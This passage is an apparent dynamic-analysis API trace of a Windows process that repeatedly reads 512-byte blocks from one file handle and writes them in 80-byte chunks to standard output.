lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.728] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.728] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] GetFileType (hFile=0x4c) returned 0x1 [0092.728] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.728] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.729] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.729] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] GetFileType (hFile=0x4c) returned 0x1 [0092.729] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.729] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.730] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] GetFileType (hFile=0x4c) returned 0x1 [0092.730] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.730] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.731] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.731] GetFileType (hFile=0x4c) returned 0x1 [0092.731] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.732] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.732] GetFileType (hFile=0x4c) returned 0x1 [0092.732] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.733] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] GetFileType (hFile=0x4c) returned 0x1 [0092.733] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.733] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.734] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.734] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.734] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f388*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3d8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f3d8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f428*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f428*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f478*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f478*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4c8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f4c8*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] GetFileType (hFile=0x4c) returned 0x1 [0092.735] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.735] WriteFile (in: hFile=0x4c, lpBuffer=0x14f518*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f518*, lpNumberOfBytesWritten=0x14e51c*=0x20, lpOverlapped=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.735] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f338*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e51c, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesWritten=0x14e51c*=0x50, lpOverlapped=0x0) returned 1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] GetFileType (hFile=0x4c) returned 0x1 [0092.736] _get_osfhandle (_FileHandle=1) returned 0x4c [0092.736] WriteFile (in: hFile=0x4c, lpBuffer=0x14f388*, 